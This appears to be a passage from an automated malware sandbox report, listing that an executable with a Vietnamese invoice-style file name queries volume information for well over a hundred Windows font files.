Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Y#U00eau c#U1ea7u b#U00e1o gi#U00e1 INV20230104-VN.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
